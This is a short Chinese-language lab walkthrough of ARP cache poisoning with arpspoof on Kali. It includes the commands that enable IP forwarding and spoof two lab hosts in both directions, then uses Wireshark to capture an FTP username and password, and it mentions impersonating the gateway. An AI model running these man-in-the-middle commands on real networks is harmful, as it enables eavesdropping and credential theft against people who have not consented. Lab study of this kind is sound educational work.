ARP緩存攻擊的原理這裏就不說明了,直接開啓實驗。
在kali上開啓IP轉發:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof是一款簡單易用的arp緩存攻擊工具。在使用時需要指定具體的網絡接口,攻擊的目標主機以及想要僞裝的IP地址。(沒有指定目標主機的話會對整個網絡進行攻擊)
arpspoof -i 網卡 -t 目標IP 想要僞裝的IP
kali:
arpspoof -i eth0 -t 192.168.17.131 192.168.17.130
:告訴131我就是130.
win2008的arp緩存表:
192.168.17.130的mac地址已經變爲了kali的mac地址。
那麼131發送給130的消息就會被送到kali主機。
kali:
arpspoof -i eth0 -t 192.168.17.130 192.168.17.131
告訴130我就是131
winxp的arp緩存表:
192.168.17.131的mac地址也已經變爲了kali的mac地址。
那麼130發送給131的消息就會被送到kali主機。
由於kali開啓了IP轉發功能,就已經實現了131與130之間的通信監聽。
在winxp上登錄win2008的ftp服務器。
用戶名:administrator
密碼:123.com
在kali上開啓wireshark抓包:
成功捕獲用戶名與密碼。
上述用法還可以用來冒充網關。